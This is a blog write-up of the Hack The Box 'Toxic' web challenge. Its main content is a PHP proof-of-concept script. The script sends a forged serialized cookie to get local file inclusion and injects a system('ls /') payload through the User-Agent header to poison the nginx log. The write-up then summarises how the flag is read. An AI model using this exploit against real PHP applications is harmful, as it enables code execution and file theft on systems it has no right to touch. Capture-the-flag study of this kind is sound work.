Post

HackTheBox Toxic Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Toxic Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<?php
if ($argc < 3) {
    echo "Usage: php poc <url> <path>\n";
    exit(1);
}
class PageModel
{
    public $file;
    public function __construct($file)
    {
        $this->file = $file;
    }
}
$url = $argv[1];
$file_path = $argv[2];
$page_model = new PageModel($file_path);
$payload = base64_encode(serialize($page_model));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Cookie: PHPSESSID=$payload",
    "User-Agent: <?php system('ls /'); ?>"
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Response:\n$response\n";

1

php poc <url> <path>

1
2

/var/log/nginx/access.log
/flag_Xapdy

Summary

The exploit leverages LFI with a crafted PHPSESSID cookie and a malicious User-Agent. The User-Agent executes ls / via system commands, exposing directory contents in the first log file. Using LFI, the log file is read to locate the flag path, which is then accessed to retrieve the flag.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.